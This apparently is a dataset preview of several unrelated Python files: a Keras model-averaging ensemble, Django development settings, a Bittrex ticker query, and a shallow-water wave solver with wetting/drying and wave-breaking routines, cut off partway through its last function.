text stringlengths 38 1.54M |
|---|
import tensorflowjs as tfjs
import pandas as pd
from keras.models import load_model
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from keras.preprocessing.text import *
from keras.utils import to_categorical
from keras.models import Model
from keras.layers import Input, Average
from Data_proc import text2seq, text2matrix, MAX_WORD, Y_CLASS, TRAINING_PATH, MAX_LEN
# Load the train/test splits in two feature representations:
#   *A: padded token-id sequences (input to the sequence models)
#   *B: document-term (bag-of-words) matrices (input to the dense model)
X_trainA, X_testA, Y_trainA, Y_testA = text2seq()
X_trainB, X_testB, Y_trainB, Y_testB = text2matrix()
# Each pre-trained model ships in TensorFlow.js format; convert it back to a
# Keras HDF5 file and reload with load_model so it can be reused as a layer.
EMB = tfjs.converters.load_keras_model('./1D_YoonKim_Model/model.json')
EMB.save('1D_YoonKim_Model_hyp.h5')
EMB_MODEL = load_model('1D_YoonKim_Model_hyp.h5')
BOW = tfjs.converters.load_keras_model('./DNN_NE_HypOpt/model.json')
BOW.save('DNN_NE_hyp.h5')
BOW_MODEL = load_model('DNN_NE_hyp.h5')
CBOW = tfjs.converters.load_keras_model('./Transfer_CBOW_DNN/model.json')
CBOW.save('Transfer_CBOW_DNN_hyp.h5')
CBOW_MODEL = load_model('Transfer_CBOW_DNN_hyp.h5')
# Compile each model so it could also be evaluated on its own; the ensemble
# built below is compiled separately.
EMB_MODEL.compile(loss='categorical_crossentropy', optimizer="adam", metrics=['accuracy'])
BOW_MODEL.compile(loss='categorical_crossentropy', optimizer="adam", metrics=['accuracy'])
CBOW_MODEL.compile(loss='categorical_crossentropy', optimizer="adam", metrics=['accuracy'])
def ensemble():
    """Build a two-input averaging ensemble of the pre-loaded models.

    inputA carries padded token-id sequences (length MAX_LEN) for the
    sequence models; inputB carries bag-of-words vectors (size MAX_WORD)
    for the dense model. The active configuration averages the CBOW and
    BOW predictions; the other combinations tried during experiments are
    kept commented below for reference.

    Returns the uncompiled keras Model.
    """
    # The module-level models are only read here, so the former `global`
    # statement was unnecessary and has been removed.
    inputA = Input(shape=(MAX_LEN,))
    inputB = Input(shape=(MAX_WORD,))
    #average = CBOW_MODEL(inputA)
    # ALL
    # average = Average()([EMB_MODEL(inputA), CBOW_MODEL(inputA), BOW_MODEL(inputB)])
    # EMB, CBOW
    # average = Average()([EMB_MODEL(inputA), CBOW_MODEL(inputA)])
    # EMB, BOW
    # average = Average()([EMB_MODEL(inputA), BOW_MODEL(inputB)])
    # CBOW, BOW
    average = Average()([CBOW_MODEL(inputA), BOW_MODEL(inputB)])
    model = Model(inputs=[inputA, inputB], outputs=average)
    return model
# Build, inspect and score the averaging ensemble on the held-out split.
model_ensemble = ensemble()
model_ensemble.summary()
model_ensemble.compile(loss='categorical_crossentropy', optimizer="adam", metrics=['accuracy'])
# Both inputs describe the same documents, so the labels of split A apply.
score = model_ensemble.evaluate([X_testA, X_testB], Y_testA)
print('Test loss: ', score[0])
print('Test Accuracy: ', score[1])
|
from base import *
# Local development overrides for the base Django settings.
DEBUG = True
SITE_URL = 'http://localhost:8000/'
MEDIA_URL = 'http://localhost:8000/site_media/'
# Disable caching in development (fixed: a stray trailing '|' artifact made
# this line a syntax error).
CACHE_BACKEND = 'dummy://'
from bitex import Bittrex
# Authenticate against the Bittrex API using credentials stored on disk.
k = Bittrex(key_file='bittrex.key')
# Fetch a ticker snapshot for the BTC-BTS market.
r = k.ticker('BTC-BTS')
import pprint  # NOTE(review): imported but unused -- pprint.pprint(r.json()) was likely intended
# Print the library-formatted view and the raw JSON payload of the response.
print((r.formatted))
print((r.json()))
|
# ----------module for core solver functions
import numpy as np
import SWIC_IO_module as IO # input-output module
import sys
from statistics import mode
import scipy.sparse
import scipy.sparse.linalg
def fill_zeros_with_last(arr):
    """Forward-fill zero entries of a 1-D array with the last non-zero value.

    Leading zeros (before any non-zero entry) are filled with arr[0].
    Returns a new array; the input is not modified.
    """
    positions = np.arange(arr.size)
    # Zero entries point back at index 0; a running maximum then maps every
    # element to the index of the most recent non-zero value.
    source_idx = np.where(arr != 0, positions, 0)
    source_idx = np.maximum.accumulate(source_idx)
    return arr[source_idx]
#--------------------------------------------------------------------------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#---------------------------------Initializing computatonal grid variables-------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#--------------------------------------------------------------------------------------------------------------
def intialize_Cgrid(inpt):
    """Allocate and zero-initialise the computational-grid arrays.

    Depending on inpt['mode'] ('1D' or '2D'), returns the grid size(s),
    coordinate array(s), depth, edge water heights, elevation and flux
    arrays for current/previous time steps, breaking/wet flags and the
    friction-coefficient array.

    NOTE(review): grid extents and spacings are read from the module-level
    IO.inpt rather than the `inpt` argument -- confirm both always refer to
    the same dictionary.
    """
    if inpt['mode'] == '1D':
        nx = int(IO.inpt['Lx']/IO.inpt['del_x'])+1 # number of points in X
        d = np.zeros((nx)) # depth
        h_flow = np.zeros((nx+1)) # water height h at cell edges
        # current time step
        elv_cu = np.zeros((nx)) # elevation at current time step
        U_cu = np.zeros((nx+1)) # flux in X at current time step
        # previous time step
        elv_pr = np.zeros((nx)) # elevation at previous time step
        U_pr = np.zeros((nx+1)) # flux in X at previous time step
        ## flags for tracking breaking and dry-wet conditions
        wave_break = np.zeros((nx)) # wave-breaking flag of the cell
        wet = np.zeros((nx)) # dry-wet status flag of the cell
        # velocity array (allocated but not returned)
        U = np.zeros((nx+1))
        # X-coordinates: uniform spacing starting at start_x
        X = np.zeros((nx))
        X[0] = IO.inpt['start_x']
        for i in range(1,nx):
            X[i] = X[i-1] + IO.inpt['del_x']
        # if constant manning is chosen, populate the friction value
        Cf = np.ones((nx))
        return [nx,X,d,h_flow,elv_cu,U_cu,elv_pr,U_pr,wave_break,wet,Cf]
    elif inpt['mode'] == '2D':
        nx = int(IO.inpt['Lx']/IO.inpt['del_x']) +1# number of points in X
        ny = int(IO.inpt['Ly']/IO.inpt['del_y']) +1# number of points in Y
        d = np.zeros((nx,ny)) # depth
        h_flow_x = np.zeros((nx+1,ny)) # water height h at x-direction cell edges
        h_flow_y = np.zeros((nx,ny+1)) # water height h at y-direction cell edges
        # current time step
        elv_cu = np.zeros((nx,ny)) # elevation at current time step
        U_cu = np.zeros((nx+1,ny)) # flux in X at current time step
        V_cu = np.zeros((nx,ny+1)) # flux in Y at current time step
        # previous time step
        elv_pr = np.zeros((nx,ny)) # elevation at previous time step
        U_pr = np.zeros((nx+1,ny)) # flux in X at previous time step
        V_pr = np.zeros((nx,ny+1)) # flux in Y at previous time step
        ## flags for tracking breaking and dry-wet conditions
        wave_break = np.zeros((nx,ny)) # wave-breaking flag of the cell
        wet = np.zeros((nx,ny)) # dry-wet status flag of the cell
        # velocity arrays (allocated but not returned)
        U = np.zeros((nx+1,ny))
        V = np.zeros((nx,ny+1))
        # X-coordinates: uniform spacing per column
        X = np.zeros((nx,ny))
        for j in range(0,ny):
            X[0,j] = IO.inpt['start_x']
            for i in range(1,nx):
                X[i,j] = X[i-1,j] + IO.inpt['del_x']
        # Y-coordinates: uniform spacing per row
        Y = np.zeros((nx,ny))
        for i in range(0,nx):
            Y[i,0] = IO.inpt['start_y']
            for j in range(1,ny):
                Y[i,j] = Y[i,j-1] + IO.inpt['del_y']
        Cf = np.ones((nx,ny))
        return [nx,ny,X,Y,d,h_flow_x,h_flow_y,elv_cu,U_cu,V_cu,elv_pr,U_pr,V_pr,wave_break,wet,Cf]
def intial_set_elvetaions_n_heights(d,elv,wet,h_flow,mode,h_flow_y = []):
    """Set the initial free-surface elevation and the edge water heights.

    Cells with non-positive depth get zero elevation; otherwise the surface
    starts at the bed level (elv = d). Edge heights are then built from
    elevation minus depth using the scheme selected by IO.inpt['Z_opt']
    ('mean', 'max' or 'upwind'; at initialisation 'upwind' is identical to
    'max'), and the wet/dry flags are seeded from the depth threshold.

    Returns [h_flow,elv,wet] in 1D, or [h_flow,h_flow_y,elv,wet] in 2D.
    NOTE(review): the mutable default `h_flow_y = []` is only safe because
    the 2D branch always receives an explicit array -- confirm callers.
    """
    if mode == '1D':
        nx = len(h_flow)
        # elevation per cell (elv has one fewer entry than h_flow)
        for i in range(0,nx-1):
            if d[i] <=0:
                elv[i] = 0
            else:
                elv[i] = d[i]
        # boundary edges use the adjacent cell directly
        h_flow[0] = elv[0] - d[0]
        h_flow[nx-1] = elv[-1] - d[-1]
        for i in range(1,nx-1):
            if IO.inpt['Z_opt'] == 'mean': #mean scheme
                h_flow[i] = (np.sum(elv[i:i+2]) - np.sum(d[i:i+2]))/2
            elif IO.inpt['Z_opt'] == 'max': #max scheme
                h_flow[i] = max(elv[i:i+2]) - max(d[i:i+2])
            elif IO.inpt['Z_opt'] == 'upwind': #upwind scheme (same as max at t=0)
                h_flow[i] = max(elv[i:i+2]) - max(d[i:i+2])
        # update wet-dry cell flags in the first calculation
        if np.any(wet == 0):
            wet[ np.where(h_flow[0:len(h_flow)-1] >= IO.inpt['depth_threshold'])] = 1 #where depth > threshold flag the cell as wet
        return [h_flow,elv,wet]
    elif mode == '2D':
        nx = np.size(d, 0)
        ny = np.size(d, 1)
        for j in range(0,ny):
            for i in range(0,nx):
                if d[i,j] <=0:
                    elv[i,j] = 0
                else:
                    elv[i,j] = d[i,j]
        # x-direction edge heights
        nx = np.size(h_flow, 0)
        ny = np.size(h_flow, 1)
        h_flow[0,:] = elv[0,:] - d[0,:]
        h_flow[nx-1,:] = elv[-1,:] - d[-1,:]
        for j in range(0,ny):
            for i in range(1,nx-1):
                if IO.inpt['Z_opt'] == 'mean': #mean scheme
                    h_flow[i,j] = (np.sum(elv[i:i+2,j]) - np.sum(d[i:i+2,j]))/2
                elif IO.inpt['Z_opt'] == 'max': #max scheme
                    h_flow[i,j] = max(elv[i:i+2,j]) - max(d[i:i+2,j])
                elif IO.inpt['Z_opt'] == 'upwind': #upwind scheme (same as max at t=0)
                    h_flow[i,j] = max(elv[i:i+2,j]) - max(d[i:i+2,j])
        # y-direction edge heights
        nx = np.size(h_flow_y, 0)
        ny = np.size(h_flow_y, 1)
        h_flow_y[:,0] = elv[:,0] - d[:,0]
        h_flow_y[:,ny-1] = elv[:,-1] - d[:,-1]
        for i in range(0,nx):
            for j in range(1,ny-1):
                if IO.inpt['Z_opt'] == 'mean': #mean scheme
                    h_flow_y[i,j] = (np.sum(elv[i,j:j+2]) - np.sum(d[i,j:j+2]))/2
                elif IO.inpt['Z_opt'] == 'max': #max scheme
                    h_flow_y[i,j] = max(elv[i,j:j+2]) - max(d[i,j:j+2])
                elif IO.inpt['Z_opt'] == 'upwind': #upwind scheme (same as max at t=0)
                    h_flow_y[i,j] = max(elv[i,j:j+2]) - max(d[i,j:j+2])
        # update wet-dry cell flags in the first calculation
        # (h_flow[0:-1] trims the extra x-edge so shapes match `wet`)
        wet[ np.where(h_flow[0:-1] >= IO.inpt['depth_threshold'])] = 1 #where depth > threshold flag the cell as wet
        return [h_flow,h_flow_y,elv,wet]
#--------------------------------------------------------------------------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#-------------------------------------------Ramp function------------------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#--------------------------------------------------------------------------------------------------------------
def ramp(t,TP):
    """Smooth cosine ramp-up factor in [0, 1].

    Rises from 0 at t=0 to 1 at t=TP following half a cosine period, and
    stays at 1 for t >= TP. Used to ease the incoming wave forcing in.
    """
    if t >= TP:
        return 1
    return 0.5 * (1 - np.cos((2 * np.pi / TP) * (t / 2)))
def Zeta_plus(t):
    """Incoming-wave surface elevation at time t, with the start-up ramp
    applied.

    Only the 'Linear' wave type is implemented; for any other
    IO.inpt['w_type'] the function falls through and returns None.
    """
    if IO.inpt['w_type'] == 'Linear':
        # monochromatic sine wave of amplitude `amp` and frequency `f`
        raw_elevation = IO.inpt['amp'] * np.sin(t *2* np.pi * IO.inpt['f'] )
        # ease the forcing in over the ramp period TP
        return raw_elevation * ramp(t,IO.inpt['TP'])
#--------------------------------------------------------------------------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#-------------------------------------------drying algorithm------------------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#--------------------------------------------------------------------------------------------------------------
def Drying_algorithm(h_flow,wet,elv,d,U_cu,mode,h_flow_y = [],V_cu = []):
    """Mark cells dry when the local water depth drops below half the
    wetting threshold (half, to give hysteresis against the wetting check),
    resetting their elevation, edge heights and fluxes to the dry state.

    Returns [h_flow,elv,wet,U_cu] in 1D, or
    [h_flow,h_flow_y,elv,wet,U_cu,V_cu] in 2D.
    """
    if mode == '1D':
        nx = len(elv)
        for i in range(1,nx):
            if h_flow[i] < IO.inpt['depth_threshold']/2: #half threshold for hysteresis
                elv[i] = d[i]              # surface collapses onto the bed
                h_flow[i] = elv[i] - d[i]  # i.e. zero water depth
                U_cu[i] = 0
                wet[i] = 0
        return [h_flow,elv,wet,U_cu]
    elif mode == '2D':
        nx = np.size(elv,0)
        ny = np.size(elv,1)
        for i in range(0,nx):
            for j in range(0,ny):
                # cell-centred depth: average of the four surrounding edge heights
                if ((h_flow[i,j] + h_flow[i+1,j] + h_flow_y[i,j] + h_flow_y[i,j+1]) /4) < IO.inpt['depth_threshold']/2: #for hysteresis
                    elv[i,j] = d[i,j]
                    h_flow[i,j] = elv[i,j] - d[i,j]
                    h_flow_y[i,j] = elv[i,j] - d[i,j]
                    h_flow_y[i,j+1] = elv[i,j] - d[i,j]
                    U_cu[i,j] = 0
                    V_cu[i,j] = 0
                    V_cu[i,j+1] = 0
                    wet[i,j] = 0
        return [h_flow,h_flow_y,elv,wet,U_cu,V_cu]
#--------------------------------------------------------------------------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#---------------------------------computing water depth grid -----------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#--------------------------------------------------------------------------------------------------------------
## h_flow calculation -- h at cell edges (water height h = zeta - d)
def set_water_height(d,elv,wet,h_flow,U_cu,mode,h_flow_y = [],V_cu = []):
    """Recompute the edge water heights for the current step and then apply
    the drying algorithm.

    The interpolation scheme is selected by IO.inpt['Z_opt']:
    'mean' averages the two adjacent cells, 'max' uses the higher
    surface/bed, 'upwind' picks the upstream cell from the sign of U_cu
    (1D only -- the 2D 'upwind' branch currently falls back to 'max').

    Returns [h_flow,elv,wet,U_cu] in 1D, or
    [h_flow,h_flow_y,elv,wet,U_cu,V_cu] in 2D.
    """
    if mode == '1D':
        nx = len(h_flow)
        h_flow[0] = elv[0] - d[0]
        # open boundary: copy the neighbouring edge value
        h_flow[nx-1] = h_flow[nx-2]
        for i in range(1,nx-1):
            if IO.inpt['Z_opt'] == 'mean': #mean scheme
                h_flow[i] = (np.sum(elv[i:i+2]) - np.sum(d[i:i+2]))/2
            elif IO.inpt['Z_opt'] == 'max': #max scheme
                h_flow[i] = max(elv[i:i+2]) - max(d[i:i+2])
            elif IO.inpt['Z_opt'] == 'upwind': #upwind scheme on the sign of the flux
                if U_cu[i] > 0:
                    h_flow[i] = elv[i-1] - d[i-1]
                elif U_cu[i] < 0:
                    h_flow[i] = elv[i] - d[i]
                elif U_cu[i] == 0:
                    h_flow[i] = max(elv[i:i+2]) - max(d[i:i+2])
        [h_flow,elv,wet,U_cu] = Drying_algorithm(h_flow,wet,elv,d,U_cu,mode)
        return [h_flow,elv,wet,U_cu]
    elif mode == '2D':
        # x-direction edges
        nx = np.size(h_flow, 0)
        ny = np.size(h_flow, 1)
        h_flow[0,:] = elv[0,:] - d[0,:]
        h_flow[nx-1,:] = elv[-1,:] - d[-1,:]
        for j in range(0,ny):
            for i in range(1,nx-1):
                if IO.inpt['Z_opt'] == 'mean': #mean scheme
                    h_flow[i,j] = (np.sum(elv[i:i+2,j]) - np.sum(d[i:i+2,j]))/2
                elif IO.inpt['Z_opt'] == 'max': #max scheme
                    h_flow[i,j] = max(elv[i:i+2,j]) - max(d[i:i+2,j])
                elif IO.inpt['Z_opt'] == 'upwind': #upwind scheme
                    # NOTE(review): unlike 1D, this ignores the flux sign and
                    # duplicates the 'max' scheme -- confirm intended.
                    h_flow[i,j] = max(elv[i:i+2,j]) - max(d[i:i+2,j])
        # y-direction edges
        nx = np.size(h_flow_y, 0)
        ny = np.size(h_flow_y, 1)
        h_flow_y[:,0] = elv[:,0] - d[:,0]
        h_flow_y[:,ny-1] = elv[:,-1] - d[:,-1]
        for i in range(0,nx):
            for j in range(1,ny-1):
                if IO.inpt['Z_opt'] == 'mean': #mean scheme
                    h_flow_y[i,j] = (np.sum(elv[i,j:j+2]) - np.sum(d[i,j:j+2]))/2
                elif IO.inpt['Z_opt'] == 'max': #max scheme
                    h_flow_y[i,j] = max(elv[i,j:j+2]) - max(d[i,j:j+2])
                elif IO.inpt['Z_opt'] == 'upwind': #upwind scheme (same note as above)
                    h_flow_y[i,j] = max(elv[i,j:j+2]) - max(d[i,j:j+2])
        [h_flow,h_flow_y,elv,wet,U_cu,V_cu] = Drying_algorithm(h_flow,wet,elv,d,U_cu,mode,h_flow_y,V_cu)
        return [h_flow,h_flow_y,elv,wet,U_cu,V_cu]
#--------------------------------------------------------------------------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#----------------------------------Flooding algorithm----------------------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#--------------------------------------------------------------------------------------------------------------
def check_flooding(wet,U_cu,d,h_flow,elv_cu,mode,h_flow_y = [],V_cu = []):
    """Flooding (wetting) algorithm: promote dry cells to wet when enough
    water flows towards them (Yamazaki-style expected-depth check).

    Returns [wet,U_cu,h_flow,elv_cu] in 1D, or
    [wet,U_cu,h_flow,elv_cu,h_flow_y,V_cu] in 2D.
    NOTE(review): for any other `mode` the function returns None.
    """
    ## FLOODING algorithm
    if np.any(wet==0):
        if mode == '1D':
            # assuming 1 cell at a time gets flooded
            i_flood = np.where(wet == 0)[0][0] #first dry cell
            dry_cell_flux = U_cu[i_flood-1] #flux in the cell before it
            if dry_cell_flux > 0: #given positive flow towards the dry cell
                # yamazaki method
                new_depth = elv_cu[i_flood-1] - d[i_flood] #check the expected depth
                if new_depth >= IO.inpt['depth_threshold']: #if the expected depth exceeds the threshold
                    h_flow[i_flood] = new_depth # assign the expected water depth
                    U_cu[i_flood] = U_cu[i_flood -1] # assign +ve flux
                    wet[i_flood] = 1 # assign wet status
            return [wet,U_cu,h_flow,elv_cu]
        elif mode == '2D':
            # candidate cells: dry cells whose x-neighbour (i-1) is wet
            wet_bool = (wet[1::] == 0) * (wet[0:-1] == 1)
            i_flood = np.where(wet_bool == True)#first dry cell
            Xs = np.array(i_flood[0])+1
            Ys = np.array(i_flood[1])
            # drop candidates on the last y-row (their j+1 neighbour is out of range)
            edges = np.where( Ys == np.size(wet,1)-1 )[0]
            Xs = np.delete(Xs,edges)
            Ys = np.delete(Ys,edges)
            # NOTE(review): multplier is initialised once and never reset, so
            # flags set while processing one candidate carry over to the next
            # loop iteration -- confirm this is intended.
            multplier = np.array([0,0])
            for i in range(0,len(Xs)):
                dry_cell_flux = U_cu[Xs[i]-1,Ys[i]] #flux in the cell before it
                x_flooding = 0
                if dry_cell_flux > 0 and (wet[Xs[i],Ys[i]-1] == 0 or wet[Xs[i],Ys[i]+1] == 0) : #given positive flow towards the dry cell
                    # yamazaki method
                    new_depth = elv_cu[Xs[i]-1,Ys[i]] - d[Xs[i]-1,Ys[i]] #check the expected depth
                    if new_depth >= IO.inpt['depth_threshold']: #if the expected depth exceeds the threshold
                        h_flow[Xs[i],Ys[i]] = new_depth # assign the expected water depth
                        h_flow_y[Xs[i],Ys[i]+1] = new_depth # assign the expected water depth
                        h_flow_y[Xs[i],Ys[i]] = new_depth # assign the expected water depth
                        U_cu[Xs[i],Ys[i]] = U_cu[Xs[i]-1,Ys[i]] # assign +ve flux
                        V_cu[Xs[i],Ys[i]+1] = V_cu[Xs[i]-1,Ys[i]+1] # assign +ve flux
                        V_cu[Xs[i],Ys[i]] = V_cu[Xs[i]-1,Ys[i]] # assign +ve flux
                        wet[Xs[i],Ys[i]] = 1 # assign wet status
                        x_flooding = 1
                elif (wet[Xs[i],Ys[i]-1] == 1 or wet[Xs[i],Ys[i]+1] == 1) :
                    # lateral (y-direction) flooding contribution
                    if V_cu[Xs[i],Ys[i]-1] > 0:
                        multplier[0] = 1
                    elif V_cu[Xs[i],Ys[i]+2] < 0:
                        multplier[1] = 1
                    # NOTE(review): x_flooding is always 0 in this branch, and the
                    # new_depth computed below is never used afterwards -- verify.
                    if x_flooding:
                        new_depth = (elv_cu[Xs[i]-1,Ys[i]] + multplier[0] * V_cu[Xs[i],Ys[i]-1] + multplier[1] * V_cu[Xs[i],Ys[i]+2])/(1 + np.sum(multplier)) - d[Xs[i]-1,Ys[i]] #check the expected depth
                    else:
                        new_depth = ( multplier[0] * V_cu[Xs[i],Ys[i]-1] + multplier[1] * V_cu[Xs[i],Ys[i]+2])/np.sum(multplier) - d[Xs[i]-1,Ys[i]] #check the expected depth
                    U_cu[Xs[i],Ys[i]] = U_cu[Xs[i]-1,Ys[i]]
                    h_flow[Xs[i],Ys[i]] = h_flow[Xs[i]-1,Ys[i]]
                    V_cu[Xs[i],Ys[i]+1] = V_cu[Xs[i],Ys[i]+2] # assign +ve flux
                    V_cu[Xs[i],Ys[i]] = V_cu[Xs[i],Ys[i]-1] # assign +ve flux
                    wet[Xs[i],Ys[i]] = 1
            return [wet,U_cu,h_flow,elv_cu,h_flow_y,V_cu]
    else:
        # nothing is dry: return the state unchanged
        if mode == '1D':
            return [wet,U_cu,h_flow,elv_cu]
        elif mode == '2D':
            return [wet,U_cu,h_flow,elv_cu,h_flow_y,V_cu]
#--------------------------------------------------------------------------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#---------------------------------check error function to stop simulation which might not ---------------------
#----------------------------------raise python errors but the physics is unreasonable-------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#--------------------------------------------------------------------------------------------------------------
def check_values(CFL,elv_pr):
    """Sanity-check the solver state and abort the run if it is unstable.

    Aborts (via sys.exit) when the CFL number exceeds 0.75 or the wave
    elevation contains NaNs or magnitudes above 20, logging the reason first.

    Fix: the explanatory elif previously tested abs(elv_pr) > 10**2 while
    the trigger used > 20, so elevations in (20, 100] stopped the run with
    no reason logged; both now use the same threshold of 20.
    """
    if CFL > 0.75 or np.any(np.isnan(elv_pr)) or np.any(abs(elv_pr) > 20):
        IO.write_log("This program is forcefully stopped as some values are abnormal or they will cause instabilies later on")
        if CFL >0.75:
            IO.write_log('CFL = %02f : must be less than 0.75 to ensure stability' %CFL)
        elif np.any(np.isnan(elv_pr)) or np.any(abs(elv_pr) > 20):
            IO.write_log('Abnormal values detected in wave elevation')
        sys.exit()
def eddy_viscosity_model(nu_eddy,U,dx,mode,d,V = [],dy = []) :
    """Smagorinsky-type eddy viscosity from velocity gradients.

    In '1D' the viscosity is built from |dU/dx| at cell centres; in '2D'
    it combines dU/dx and dV/dy. The `nu_eddy` argument is ignored and a
    freshly computed array is returned; `d` is unused.
    """
    smagorinsky_const = 0.1;
    if mode == '1D':
        velocity_grad = np.gradient(U) / dx
        nu_eddy = smagorinsky_const**2 * np.sqrt(3) * dx * abs(velocity_grad[0:-1])
    elif mode == '2D':
        dudx = np.gradient(U,axis=0)/dx
        dvdy = np.gradient(V,axis=1)/dy
        strain = dudx[0:-1,:]**2 + dvdy[:,0:-1]**2 + 0.5 * (dudx[0:-1,:]+dvdy[:,0:-1])**2
        nu_eddy = smagorinsky_const**2 * np.sqrt(2) * dx * dy * np.sqrt(strain)
    return nu_eddy
#--------------------------------------------------------------------------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#------------------------------------checking the onset of breaking--------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#--------------------------------------------------------------------------------------------------------------
def check_onset_of_breaking(d,U,elv_cu,wave_break,h_flow,X,wet,gamma):
    """Flag the cells where wave breaking occurs (1D).

    Scans seaward-to-shoreward, stops at the first cell that satisfies any
    breaking criterion, then propagates the flag through the remaining
    cells with fill_zeros_with_last. The incoming `wave_break` is discarded
    and rebuilt; `X` and `wet` are unused. Returns [wave_break].
    """
    wave_break = np.zeros(len(elv_cu)) #reset all flags for re-evaluation
    #checking the different breaking criteria
    for i in range(0,len(elv_cu)):
        if h_flow[i] > 0.5:  # only consider sufficiently deep cells
            # wave steepness: wave height vs local depth
            if abs(elv_cu[i])*2 >= 0.8 * abs(d[i]):
                wave_break[i] = 1
                break
            # wave celerity: particle speed exceeds shallow-water celerity
            elif abs(U[i]) > np.sqrt(IO.inpt['g'] * abs(d[i])):
                wave_break[i] = 1
                break
            # new wave parameter (relaxed celerity criterion, factor 0.8)
            elif abs(U[i]) > 0.8* np.sqrt(IO.inpt['g'] * abs(d[i])):
                wave_break[i] = 1
                break
            # user-supplied breaker index gamma
            elif abs(elv_cu[i])*2 >= gamma[i]* abs(d[i]):
                wave_break[i] = 1
                break
    wave_break = fill_zeros_with_last(wave_break) #makes sure the wave is dissipated along
    #the whole wave, not just the crest, from the onset of breaking
    return [wave_break]
def check_onset_of_breaking_2D(d,U,elv_cu,wave_break,h_flow_x,X,wet,gamma=None):
    """Apply the 1D breaking-onset check column by column over a 2D grid.

    Fix: the inner call previously omitted the `gamma` argument that
    check_onset_of_breaking requires, so this function always raised
    TypeError. A backward-compatible `gamma` parameter is added; when not
    supplied, a breaker index of 0.8 per cell is used, matching the 0.8
    factor of the other breaking criteria (TODO confirm intended default).

    Returns the (nx, ny) wave_break flag array.
    """
    nx = np.size(d,0)
    ny = np.size(d,1)
    if gamma is None:
        gamma = 0.8 * np.ones((nx,ny))
    wave_break = np.zeros((nx,ny))
    for j in range(0,ny):
        [wave_break[:,j]] = check_onset_of_breaking(d[:,j],U[:,j],elv_cu[:,j],wave_break[:,j],h_flow_x[:,j],X[:,j],wet[:,j],gamma[:,j])
    return wave_break
#--------------------------------------------------------------------------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#------------------------------------solver functions--------------------------------------------
#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
#--------------------------------------------------------------------------------------------------------------
def Solve_1D_elevation(elv_cu,elv_pr,U_pr,wet,del_t,h_flow): #solver for elevation
    """Explicit continuity update of the free-surface elevation (1D).

    For every wet cell the new elevation is the previous one minus
    del_t times the divergence of the edge fluxes U*h. Dry cells are
    left at zero. Returns the freshly built elv_cu array.
    """
    n_cells = len(elv_cu)
    elv_cu = np.zeros((n_cells))
    for cell in range(n_cells):
        if wet[cell] != 1:
            continue  # dry cells keep zero elevation
        elv_cu[cell] = elv_pr[cell] - (del_t * (U_pr[cell+1]*h_flow[cell+1] - U_pr[cell]*h_flow[cell])/IO.inpt['del_x'])
    return elv_cu
def make_flux_n_cel_vel(U_pr,h_flow):
    """Upwind-weighted fluxes and the positive/negative cell velocities
    used by the (currently disabled) upwind advection scheme.

    Returns [U_p, U_n]: U_p keeps only non-negative velocities, U_n only
    non-positive ones (the other entries are zeroed).

    Fixes applied (review):
      * index typos h_flow[1-2] -> h_flow[i-2] and h_flow[1+1] -> h_flow[i+1];
      * the downwind branch assigned FLU_p (leaving FLU_n always zero in the
        interior) and tested U_pr[i-1] instead of U_pr[i+1] -- it now fills
        FLU_n from the i+1 neighbour, mirroring the upwind branch.
    """
    nx = len(U_pr)
    FLU_p = np.zeros((nx))
    FLU_n = np.zeros((nx))
    U_p = np.zeros((nx))
    U_n = np.zeros((nx))
    for i in range(0,nx):
        if i == 1 or i == nx-1:
            # boundary-adjacent faces: plain local flux
            FLU_p[i] = U_pr[i] * h_flow[i]
            FLU_n[i] = U_pr[i] * h_flow[i]
            U_p[i] = FLU_p[i]/h_flow[i]
            U_n[i] = FLU_n[i]/h_flow[i]
        else:
            # upwind contribution from the i-1 side
            if U_pr[i-1] >0:
                if i >1:
                    FLU_p[i] = (U_pr[i] + U_pr[i-1])*0.5*0.5*(h_flow[i-1]+h_flow[i-2])
                else:
                    FLU_p[i] = (U_pr[i] + U_pr[i-1])*0.5*h_flow[i-1]
            elif U_pr[i-1] <= 0 :
                FLU_p[i] = (U_pr[i] + U_pr[i-1])*0.5*h_flow[i-1]
            # downwind contribution from the i+1 side
            if U_pr[i+1] >0:
                FLU_n[i] = (U_pr[i] + U_pr[i+1])*0.5*0.5*(h_flow[i]+h_flow[i+1])
            elif U_pr[i+1] <= 0 :
                FLU_n[i] = (U_pr[i] + U_pr[i+1])*0.5*h_flow[i]
            U_p[i] = 2*FLU_p[i]/(h_flow[i] +h_flow[i-1])
            U_n[i] = 2*FLU_n[i]/(h_flow[i] +h_flow[i-1])
    # keep only the positive part in U_p and the negative part in U_n
    U_p = 0.5*(U_p + abs(U_p))
    U_n = 0.5*(U_n - abs(U_n))
